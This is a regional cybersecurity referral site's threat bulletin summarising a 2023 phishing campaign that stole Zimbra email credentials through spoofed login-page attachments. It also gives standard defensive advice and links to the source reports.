icon

Digital safety starts here for both commercial and personal Use...

Defend Your Business Against the Latest WNY Cyber Threats We offer Safe, Secure and Affordable Solutions for your Business and Personal Networks and Devices.



WNYCyber is there to help you to choose the best service providers in Western New York... We DO NOT provide the services ourselves, as we are Internet Programmers who have to deak daily with Cyber Threats... (Ugghhh)... So we know what it's like and what it takes to protect OUR and OUR CUSTOMERS DATA... We built this Website to help steer you to those that can give you the best service at realistic and non-inflated prices. We do charge or collect any fees.

Buffalo, New York
United States

Current Threat Data

New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft

Cyber Security Threat Summary:
“A new "mass-spreading" social engineering campaign is targeting users of the Zimbra Collaboration email server with an aim to collect their login credentials for use in follow-on operations. The activity, active since April 2023 and still ongoing, targets a wide range of small and medium businesses and governmental entities, most of which are located in Poland, Ecuador, Mexico, Italy, and Russia. It has not been attributed to any known threat actor or group. ‘Initially, the target receives an email with a phishing page in the attached HTML file,’ ESET researcher Viktor Šperka said in a report…’The email warns the target about an email server update, account deactivation, or similar issue and directs the user to click on the attached file.’ The HTML file contains a Zimbra login page tailored to the targeted organization, with the Username field prefilled with the victim's email address to make it seem more authentic. Once the credentials are entered, they are collected from the HTML form and sent via a HTTPS POST request to an actor-controlled server” (The Hacker News, 2023).

Security Officer Comments:
To trick recipients into opening the attachment, the emails spoof the sender’s address, making it seems like the message is coming from a Zimbra administrator. In some cases, the actors have also leveraged the Zimbra accounts of previously targeted, legitimate companies to send emails to other victims, suggesting that the attackers were able to compromise administrator accounts and create new mailboxes to send phishing emails to other targets.

According to researchers, the HTML attachments leveraged in the latest campaign for the most part contain legitimate code, besides the one element pointing to the malicious phishing page. This is most likely a tactic employed by the actors to bypass antispam policies and evade email security defenses. Notably, the HTML file is also opened on the victim’s browser, making it seem like they are being directed to the legitimate Zimbra login page, despite the fact that the URL points to a local file path.

Suggested Correction(s):

  • Do not open emails or download software from untrusted sources
  • Do not click on links or attachments in emails that come from unknown senders
  • Do not supply passwords, personal, or financial information via email to anyone (sensitive information is also used for double extortion)
  • Always verify the email sender's email address, name, and domain
  • Backup important files frequently and store them separately from the main system
  • Protect devices using antivirus, anti-spam and anti-spyware software
  • Report phishing emails to the appropriate security or I.T. staff immediately


IOCs:
https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/

Link(s):
https://thehackernews.com/2023/08/new-wave-of-attack-campaign-targeting.html

Contact Us for Threat Assistance
Back to Current Threats